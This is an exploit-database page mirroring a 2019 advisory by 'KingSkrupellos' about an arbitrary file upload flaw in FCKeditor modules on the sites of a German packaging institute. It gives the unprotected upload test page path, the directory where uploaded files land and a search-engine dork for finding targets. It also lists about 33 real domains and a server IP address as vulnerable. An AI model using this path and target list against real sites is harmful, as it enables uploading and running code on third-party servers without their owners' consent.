Advertisement






Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload

CVE Category Price Severity
N/A CWE-264 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2019-03-28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030233

Below is a copy:

Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload
############################################################################################

# Exploit Title : Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : ivm-childsafe.de
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : [PDF] inurl:/modules/fck/usr/
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
Institut VerpackungsMarktForschung GMBH FCKeditor Modules is prone to a vulnerability that lets attackers 

upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. 

This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Weaknesses in this category are related to the management of permissions, privileges, and other 

security features that are used to perform access control.

############################################################################################

# Arbitrary File Upload / Insert File Exploit :
***************************************
/modules/fck/editor/filemanager/connectors/uploadtest.html

# Directory File Path :
*********************
/modules/fck/usr/[YOURFILENAME].txt .jpg .gif .png

############################################################################################

# Example Vulnerable Sites :
*************************
[+] Vulnerable IP Address => 46.4.112.25 => There are 140 domains hosted on this server.

[+] heizungsfilter.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-childsafe.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-childsafe.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-safe.info/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-safe.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childproofpackaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] antonischki.net/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindersicherheit.biz/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-resistant-packages.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-resistant-packaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-resistant.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-resistant.net/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] child-resistant.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childproof.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistant.net/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistant.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistantpackages.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistantpackaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistantpackaging.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistantpackaging.net/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] childresistantpackaging.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-childsave.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-childsave.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-lab.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] ivm-lab.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindergesichert.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindergesicherte-verpackungen.com/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindergesicherte-verpackungen.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindergesicherte-verpackungen.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindergesicherte.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindersicher.org/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindersichere-verpackungen.de/modules/fck/editor/filemanager/connectors/uploadtest.html

[+] kindersichere.de/modules/fck/editor/filemanager/connectors/uploadtest.html

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum